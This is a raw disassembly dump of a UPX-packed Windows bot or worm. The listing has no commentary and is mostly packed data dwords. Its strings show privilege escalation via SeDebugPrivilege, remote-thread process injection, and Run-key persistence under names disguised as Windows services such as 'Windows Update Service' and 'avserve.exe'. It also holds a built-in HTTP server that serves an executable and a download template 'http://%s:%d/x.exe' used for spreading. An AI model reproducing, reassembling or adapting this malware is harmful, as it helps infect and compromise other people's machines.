dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm19 db 'uterm19',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D38 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 10h
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 68h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
